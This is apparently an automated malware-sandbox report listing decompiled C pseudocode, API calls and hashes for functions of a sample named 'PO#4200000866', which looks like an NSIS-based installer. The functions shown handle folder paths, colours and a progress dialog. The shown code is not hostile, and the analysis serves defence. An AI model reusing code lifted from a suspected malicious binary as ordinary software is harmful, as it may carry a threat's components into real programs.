                                                                                      C-Code - Quality: 72%
                                                                                      			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                      				struct _ITEMIDLIST* _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _t44;
                                                                                      				WCHAR* _t45;
                                                                                      				signed char _t47;
                                                                                      				signed int _t48;
                                                                                      				short _t59;
                                                                                      				short _t61;
                                                                                      				short _t63;
                                                                                      				void* _t71;
                                                                                      				signed int _t77;
                                                                                      				signed int _t78;
                                                                                      				short _t81;
                                                                                      				short _t82;
                                                                                      				signed char _t84;
                                                                                      				signed int _t85;
                                                                                      				void* _t98;
                                                                                      				void* _t104;
                                                                                      				intOrPtr* _t105;
                                                                                      				void* _t107;
                                                                                      				WCHAR* _t108;
                                                                                      				void* _t110;
                                                                                      
                                                                                      				_t107 = __esi;
                                                                                      				_t104 = __edi;
                                                                                      				_t71 = __ebx;
                                                                                      				_t44 = _a8;
                                                                                      				if(_t44 < 0) {
                                                                                      					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                                                      				}
                                                                                      				_push(_t71);
                                                                                      				_push(_t107);
                                                                                      				_push(_t104);
                                                                                      				_t105 =  *0x42a298 + _t44 * 2;
                                                                                      				_t45 = 0x428200;
                                                                                      				_t108 = 0x428200;
                                                                                      				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                                                      					_t108 = _a4;
                                                                                      					_a4 = _a4 & 0x00000000;
                                                                                      				}
                                                                                      				_t81 =  *_t105;
                                                                                      				_a8 = _t81;
                                                                                      				if(_t81 == 0) {
                                                                                      					L43:
                                                                                      					 *_t108 =  *_t108 & 0x00000000;
                                                                                      					if(_a4 == 0) {
                                                                                      						return _t45;
                                                                                      					}
                                                                                      					return E00406668(_a4, _t45);
                                                                                      				} else {
                                                                                      					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                      						_t98 = 2;
                                                                                      						_t105 = _t105 + _t98;
                                                                                      						if(_t81 >= 4) {
                                                                                      							if(__eflags != 0) {
                                                                                      								 *_t108 = _t81;
                                                                                      								_t108 = _t108 + _t98;
                                                                                      								__eflags = _t108;
                                                                                      							} else {
                                                                                      								 *_t108 =  *_t105;
                                                                                      								_t108 = _t108 + _t98;
                                                                                      								_t105 = _t105 + _t98;
                                                                                      							}
                                                                                      							L42:
                                                                                      							_t82 =  *_t105;
                                                                                      							_a8 = _t82;
                                                                                      							if(_t82 != 0) {
                                                                                      								_t81 = _a8;
                                                                                      								continue;
                                                                                      							}
                                                                                      							goto L43;
                                                                                      						}
                                                                                      						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                      						_t47 =  *_t105;
                                                                                      						_t48 = _t47 & 0x000000ff;
                                                                                      						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                      						_t85 = _t84 & 0x000000ff;
                                                                                      						_v28 = _t48 | 0x00008000;
                                                                                      						_t77 = 2;
                                                                                      						_v16 = _t85;
                                                                                      						_t105 = _t105 + _t77;
                                                                                      						_v24 = _t48;
                                                                                      						_v20 = _t85 | 0x00008000;
                                                                                      						if(_a8 != _t77) {
                                                                                      							__eflags = _a8 - 3;
                                                                                      							if(_a8 != 3) {
                                                                                      								__eflags = _a8 - 1;
                                                                                      								if(__eflags == 0) {
                                                                                      									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                                      									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                                      								}
                                                                                      								L38:
                                                                                      								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                                      								_t45 = 0x428200;
                                                                                      								goto L42;
                                                                                      							}
                                                                                      							_t78 = _v12;
                                                                                      							__eflags = _t78 - 0x1d;
                                                                                      							if(_t78 != 0x1d) {
                                                                                      								__eflags = (_t78 << 0xb) + 0x42b000;
                                                                                      								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                                                      							} else {
                                                                                      								E004065AF(_t108,  *0x42a268);
                                                                                      							}
                                                                                      							__eflags = _t78 + 0xffffffeb - 7;
                                                                                      							if(__eflags < 0) {
                                                                                      								L29:
                                                                                      								E004068EF(_t108);
                                                                                      							}
                                                                                      							goto L38;
                                                                                      						}
                                                                                      						if( *0x42a2e4 != 0) {
                                                                                      							_t77 = 4;
                                                                                      						}
                                                                                      						_t121 = _t48;
                                                                                      						if(_t48 >= 0) {
                                                                                      							__eflags = _t48 - 0x25;
                                                                                      							if(_t48 != 0x25) {
                                                                                      								__eflags = _t48 - 0x24;
                                                                                      								if(_t48 == 0x24) {
                                                                                      									GetWindowsDirectoryW(_t108, 0x400);
                                                                                      									_t77 = 0;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									__eflags = _t77;
                                                                                      									if(_t77 == 0) {
                                                                                      										goto L26;
                                                                                      									}
                                                                                      									_t59 =  *0x42a264;
                                                                                      									_t77 = _t77 - 1;
                                                                                      									__eflags = _t59;
                                                                                      									if(_t59 == 0) {
                                                                                      										L22:
                                                                                      										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                                      										__eflags = _t61;
                                                                                      										if(_t61 != 0) {
                                                                                      											L24:
                                                                                      											 *_t108 =  *_t108 & 0x00000000;
                                                                                      											__eflags =  *_t108;
                                                                                      											continue;
                                                                                      										}
                                                                                      										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                                      										_a8 = _t61;
                                                                                      										__imp__CoTaskMemFree(_v8);
                                                                                      										__eflags = _a8;
                                                                                      										if(_a8 != 0) {
                                                                                      											goto L26;
                                                                                      										}
                                                                                      										goto L24;
                                                                                      									}
                                                                                      									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                                      									__eflags = _t63;
                                                                                      									if(_t63 == 0) {
                                                                                      										goto L26;
                                                                                      									}
                                                                                      									goto L22;
                                                                                      								}
                                                                                      								goto L26;
                                                                                      							}
                                                                                      							GetSystemDirectoryW(_t108, 0x400);
                                                                                      							goto L26;
                                                                                      						} else {
                                                                                      							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                                      							if( *_t108 != 0) {
                                                                                      								L27:
                                                                                      								if(_v16 == 0x1a) {
                                                                                      									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                      								}
                                                                                      								goto L29;
                                                                                      							}
                                                                                      							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                                                      							L26:
                                                                                      							if( *_t108 == 0) {
                                                                                      								goto L29;
                                                                                      							}
                                                                                      							goto L27;
                                                                                      						}
                                                                                      					}
                                                                                      					goto L43;
                                                                                      				}
                                                                                      			}





























                                                                                      0x004066a5
                                                                                      0x004066a5
                                                                                      0x004066a5
                                                                                      0x004066ab
                                                                                      0x004066b0
                                                                                      0x004066c1
                                                                                      0x004066c1
                                                                                      0x004066c9
                                                                                      0x004066ca
                                                                                      0x004066cb
                                                                                      0x004066cc
                                                                                      0x004066cf
                                                                                      0x004066d7
                                                                                      0x004066d9
                                                                                      0x004066ea
                                                                                      0x004066ed
                                                                                      0x004066ed
                                                                                      0x004066f1
                                                                                      0x004066f7
                                                                                      0x004066fa
                                                                                      0x004068d5
                                                                                      0x004068d5
                                                                                      0x004068e0
                                                                                      0x004068ec
                                                                                      0x004068ec
                                                                                      0x00000000
                                                                                      0x00406700
                                                                                      0x00406705
                                                                                      0x0040671a
                                                                                      0x0040671b
                                                                                      0x00406721
                                                                                      0x004068b3
                                                                                      0x004068c1
                                                                                      0x004068c4
                                                                                      0x004068c4
                                                                                      0x004068b5
                                                                                      0x004068b8
                                                                                      0x004068bb
                                                                                      0x004068bd
                                                                                      0x004068bd
                                                                                      0x004068c6
                                                                                      0x004068c6
                                                                                      0x004068cc
                                                                                      0x004068cf
                                                                                      0x00406702
                                                                                      0x00000000
                                                                                      0x00406702
                                                                                      0x00000000
                                                                                      0x004068cf
                                                                                      0x00406727
                                                                                      0x0040672a
                                                                                      0x00406739
                                                                                      0x00406740
                                                                                      0x0040674c
                                                                                      0x0040674f
                                                                                      0x00406752
                                                                                      0x00406753
                                                                                      0x00406758
                                                                                      0x0040675e
                                                                                      0x00406761
                                                                                      0x00406764
                                                                                      0x00406857
                                                                                      0x0040685c
                                                                                      0x0040688f
                                                                                      0x00406894
                                                                                      0x00406899
                                                                                      0x0040689e
                                                                                      0x0040689e
                                                                                      0x004068a3
                                                                                      0x004068a9
                                                                                      0x004068ac
                                                                                      0x00000000
                                                                                      0x004068ac
                                                                                      0x0040685e
                                                                                      0x00406861
                                                                                      0x00406864
                                                                                      0x00406879
                                                                                      0x00406880
                                                                                      0x00406866
                                                                                      0x0040686d
                                                                                      0x0040686d
                                                                                      0x00406888
                                                                                      0x0040688b
                                                                                      0x0040684f
                                                                                      0x00406850
                                                                                      0x00406850
                                                                                      0x00000000
                                                                                      0x0040688b
                                                                                      0x00406771
                                                                                      0x00406775
                                                                                      0x00406775
                                                                                      0x00406776
                                                                                      0x00406778
                                                                                      0x004067b5
                                                                                      0x004067b8
                                                                                      0x004067c8
                                                                                      0x004067cb
                                                                                      0x004067d3
                                                                                      0x004067d9
                                                                                      0x004067d9
                                                                                      0x00406834
                                                                                      0x00406834
                                                                                      0x00406836
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004067dd
                                                                                      0x004067e2
                                                                                      0x004067e3
                                                                                      0x004067e5
                                                                                      0x004067fc
                                                                                      0x0040680a
                                                                                      0x00406810
                                                                                      0x00406812
                                                                                      0x00406830
                                                                                      0x00406830
                                                                                      0x00406830
                                                                                      0x00000000
                                                                                      0x00406830
                                                                                      0x00406818
                                                                                      0x00406821
                                                                                      0x00406824
                                                                                      0x0040682a
                                                                                      0x0040682e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040682e
                                                                                      0x004067f6
                                                                                      0x004067f8
                                                                                      0x004067fa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004067fa
                                                                                      0x00000000
                                                                                      0x00406834
                                                                                      0x004067c0
                                                                                      0x00000000
                                                                                      0x0040677a
                                                                                      0x00406798
                                                                                      0x004067a1
                                                                                      0x0040683e
                                                                                      0x00406842
                                                                                      0x0040684a
                                                                                      0x0040684a
                                                                                      0x00000000
                                                                                      0x00406842
                                                                                      0x004067ab
                                                                                      0x00406838
                                                                                      0x0040683c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040683c
                                                                                      0x00406778
                                                                                      0x00000000
                                                                                      0x00406705

                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                      • lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 4260037668-1230650788
                                                                                      • Opcode ID: 9f4fafc628665f4e3de53f714144c0c97ccd428d1f066c6fc274ab20b847c6a6
                                                                                      • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                      • Opcode Fuzzy Hash: 9f4fafc628665f4e3de53f714144c0c97ccd428d1f066c6fc274ab20b847c6a6
                                                                                      • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                      				struct tagLOGBRUSH _v16;
                                                                                      				long _t39;
                                                                                      				long _t41;
                                                                                      				void* _t44;
                                                                                      				signed char _t50;
                                                                                      				long* _t54;
                                                                                      
                                                                                      				if(_a4 + 0xfffffecd > 5) {
                                                                                      					L18:
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                      				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                      					goto L18;
                                                                                      				} else {
                                                                                      					_t50 = _t54[5];
                                                                                      					if((_t50 & 0xffffffe0) != 0) {
                                                                                      						goto L18;
                                                                                      					}
                                                                                      					_t39 =  *_t54;
                                                                                      					if((_t50 & 0x00000002) != 0) {
                                                                                      						_t39 = GetSysColor(_t39);
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000001) != 0) {
                                                                                      						SetTextColor(_a8, _t39);
                                                                                      					}
                                                                                      					SetBkMode(_a8, _t54[4]);
                                                                                      					_t41 = _t54[1];
                                                                                      					_v16.lbColor = _t41;
                                                                                      					if((_t54[5] & 0x00000008) != 0) {
                                                                                      						_t41 = GetSysColor(_t41);
                                                                                      						_v16.lbColor = _t41;
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000004) != 0) {
                                                                                      						SetBkColor(_a8, _t41);
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000010) != 0) {
                                                                                      						_v16.lbStyle = _t54[2];
                                                                                      						_t44 = _t54[3];
                                                                                      						if(_t44 != 0) {
                                                                                      							DeleteObject(_t44);
                                                                                      						}
                                                                                      						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                      					}
                                                                                      					return _t54[3];
                                                                                      				}
                                                                                      			}









                                                                                      0x0040463d
                                                                                      0x004046f3
                                                                                      0x00000000
                                                                                      0x004046f3
                                                                                      0x0040464e
                                                                                      0x00404652
                                                                                      0x00000000
                                                                                      0x0040466c
                                                                                      0x0040466c
                                                                                      0x00404675
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404677
                                                                                      0x00404683
                                                                                      0x00404686
                                                                                      0x00404686
                                                                                      0x0040468c
                                                                                      0x00404692
                                                                                      0x00404692
                                                                                      0x0040469e
                                                                                      0x004046a4
                                                                                      0x004046ab
                                                                                      0x004046ae
                                                                                      0x004046b1
                                                                                      0x004046b3
                                                                                      0x004046b3
                                                                                      0x004046bb
                                                                                      0x004046c1
                                                                                      0x004046c1
                                                                                      0x004046cb
                                                                                      0x004046d0
                                                                                      0x004046d3
                                                                                      0x004046d8
                                                                                      0x004046db
                                                                                      0x004046db
                                                                                      0x004046eb
                                                                                      0x004046eb
                                                                                      0x00000000
                                                                                      0x004046ee

                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                      • GetSysColor.USER32(00000000), ref: 00404686
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                      • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                      • GetSysColor.USER32(?), ref: 004046B1
                                                                                      • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                      • DeleteObject.GDI32(?), ref: 004046DB
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                      • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                      • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                      • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E004068EF(WCHAR* _a4) {
                                                                                      				short _t5;
                                                                                      				short _t7;
                                                                                      				WCHAR* _t19;
                                                                                      				WCHAR* _t20;
                                                                                      				WCHAR* _t21;
                                                                                      
                                                                                      				_t20 = _a4;
                                                                                      				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                      					_t20 =  &(_t20[4]);
                                                                                      				}
                                                                                      				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                                                      					_t20 =  &(_t20[2]);
                                                                                      				}
                                                                                      				_t5 =  *_t20;
                                                                                      				_t21 = _t20;
                                                                                      				_t19 = _t20;
                                                                                      				if(_t5 != 0) {
                                                                                      					do {
                                                                                      						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                                                      							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                      							_t19 = CharNextW(_t19);
                                                                                      						}
                                                                                      						_t20 = CharNextW(_t20);
                                                                                      						_t5 =  *_t20;
                                                                                      					} while (_t5 != 0);
                                                                                      				}
                                                                                      				 *_t19 =  *_t19 & 0x00000000;
                                                                                      				while(1) {
                                                                                      					_push(_t19);
                                                                                      					_push(_t21);
                                                                                      					_t19 = CharPrevW();
                                                                                      					_t7 =  *_t19;
                                                                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *_t19 =  *_t19 & 0x00000000;
                                                                                      					if(_t21 < _t19) {
                                                                                      						continue;
                                                                                      					}
                                                                                      					break;
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}








                                                                                      0x004068f1
                                                                                      0x004068fa
                                                                                      0x00406911
                                                                                      0x00406911
                                                                                      0x00406918
                                                                                      0x00406924
                                                                                      0x00406924
                                                                                      0x00406927
                                                                                      0x0040692a
                                                                                      0x0040692f
                                                                                      0x00406931
                                                                                      0x0040693a
                                                                                      0x0040693e
                                                                                      0x0040695b
                                                                                      0x00406963
                                                                                      0x00406963
                                                                                      0x00406968
                                                                                      0x0040696a
                                                                                      0x0040696d
                                                                                      0x00406972
                                                                                      0x00406973
                                                                                      0x00406977
                                                                                      0x00406977
                                                                                      0x00406978
                                                                                      0x0040697f
                                                                                      0x00406981
                                                                                      0x00406988
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406990
                                                                                      0x00406996
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406996
                                                                                      0x0040699b

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75703420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                      • CharNextW.USER32(?,00000000,75703420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                      • CharPrevW.USER32(?,?,75703420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-2977677972
                                                                                      • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                      • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                      • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                      • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040302E(intOrPtr _a4) {
                                                                                      				short _v132;
                                                                                      				long _t6;
                                                                                      				struct HWND__* _t7;
                                                                                      				struct HWND__* _t15;
                                                                                      
                                                                                      				if(_a4 != 0) {
                                                                                      					_t15 =  *0x420efc; // 0x0
                                                                                      					if(_t15 != 0) {
                                                                                      						_t15 = DestroyWindow(_t15);
                                                                                      					}
                                                                                      					 *0x420efc = 0;
                                                                                      					return _t15;
                                                                                      				}
                                                                                      				__eflags =  *0x420efc; // 0x0
                                                                                      				if(__eflags != 0) {
                                                                                      					return E00406A71(0);
                                                                                      				}
                                                                                      				_t6 = GetTickCount();
                                                                                      				__eflags = _t6 -  *0x42a26c;
                                                                                      				if(_t6 >  *0x42a26c) {
                                                                                      					__eflags =  *0x42a268;
                                                                                      					if( *0x42a268 == 0) {
                                                                                      						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                                                      						 *0x420efc = _t7;
                                                                                      						return ShowWindow(_t7, 5);
                                                                                      					}
                                                                                      					__eflags =  *0x42a314 & 0x00000001;
                                                                                      					if(( *0x42a314 & 0x00000001) != 0) {
                                                                                      						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                                                      						return E004056CA(0,  &_v132);
                                                                                      					}
                                                                                      				}
                                                                                      				return _t6;
                                                                                      			}







                                                                                      0x0040303d
                                                                                      0x0040303f
                                                                                      0x00403046
                                                                                      0x00403049
                                                                                      0x00403049
                                                                                      0x0040304f
                                                                                      0x00000000
                                                                                      0x0040304f
                                                                                      0x00403057
                                                                                      0x0040305d
                                                                                      0x00000000
                                                                                      0x00403060
                                                                                      0x00403067
                                                                                      0x0040306d
                                                                                      0x00403073
                                                                                      0x00403075
                                                                                      0x0040307b
                                                                                      0x004030b9
                                                                                      0x004030c2
                                                                                      0x00000000
                                                                                      0x004030c7
                                                                                      0x0040307d
                                                                                      0x00403084
                                                                                      0x00403095
                                                                                      0x00000000
                                                                                      0x004030a3
                                                                                      0x00403084
                                                                                      0x004030cf

                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                                      • GetTickCount.KERNEL32 ref: 00403067
                                                                                      • wsprintfW.USER32 ref: 00403095
                                                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                        • Part of subcall function 00403012: MulDiv.KERNEL32(00008000,00000064,000019F0), ref: 00403027
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 722711167-2449383134
                                                                                      • Opcode ID: ad94e6eeeea8a1cbe270cf80bb920a468dc55bb5e304c2627f90dd203c68164d
                                                                                      • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                      • Opcode Fuzzy Hash: ad94e6eeeea8a1cbe270cf80bb920a468dc55bb5e304c2627f90dd203c68164d
                                                                                      • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                                                      				long _v8;
                                                                                      				signed char _v12;
                                                                                      				unsigned int _v16;
                                                                                      				void* _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				long _v56;
                                                                                      				void* _v60;
                                                                                      				long _t15;
                                                                                      				unsigned int _t19;
                                                                                      				signed int _t25;
                                                                                      				struct HWND__* _t28;
                                                                                      
                                                                                      				_t28 = _a4;
                                                                                      				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                      				if(_a8 == 0) {
                                                                                      					L4:
                                                                                      					_v56 = _t15;
                                                                                      					_v60 = 4;
                                                                                      					SendMessageW(_t28, 0x113e, 0,  &_v60);
